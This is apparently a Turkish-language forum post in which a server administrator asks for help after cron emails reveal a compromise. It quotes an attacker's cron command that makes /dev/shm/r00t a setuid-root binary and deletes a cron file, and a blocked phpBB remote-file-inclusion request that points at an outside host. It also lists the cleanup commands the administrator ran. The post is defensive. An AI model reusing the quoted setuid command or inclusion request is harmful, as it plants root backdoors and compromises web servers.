Benim Sorunum Şu Bana Serverımdan Her Dakika
“Cron Daemon Mailadres:
root@xxx.alanadım.org” adresinden
“Cron <root@php> chown root:root /dev/shm/r00t && chmod 4755 /dev/shm/r00t && rm -rf /etc/cron.d/core && kill -USR1 21944”
konusu ile
/bin/sh: line 0: kill: (21944) - No such process
İçerikli mail geliyor
Muhtemelen Exploit gibi aklıma geliyor.
Sunucunun Bulunduğu Firmadan
---------------
NOTES: Cease & Desist the attempted upload of malicious code for a known PHPBB vulnerability. Work through the Exploit Removal
Instructions located below my signature block.
Date & Time: 2006-12-11 17:24:48 -0500 GMT (EST) Blocked IP: 72.36.206.74 User Agent: libwww-perl/5.805 Request URI: /forums/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://albaniannetwork.ch/httpds/lol.txt?
--------------------------
Şeklinde Mail Aldım
Bende
chmod 0750 `which curl` 2>&-; chmod 0750 `which fetch` 2>&-; chmod 0750 `which wget` 2>&-
ve
sh
for x in "/dev/shm /tmp /usr/local/apache/proxy /var/spool /var/tmp"; do ls -loAFR $x 2>&- | grep -E "^$|^/| apache | nobody | unknown | www | web | htdocs " | grep -E "^$|^/|/$|\\*$|\\.pl$" | grep -Ev "sess_" | tee exploits.txt; done; echo -e "\\n\\nPossible Exploit Files and Directories: `grep -Ev "^$|^/" exploits.txt | wc -l | tr -d ' '`" | tee -a exploits.txt
exit
Işlemlerini Yaptım Ama Hala Sorun Çözülmedi
Sunucuya
clamav-0.88.7 ve rkhunter-1.2.8 kurdum
Yardımlarınız Için Şimdiden Sonsuz Teşekürler…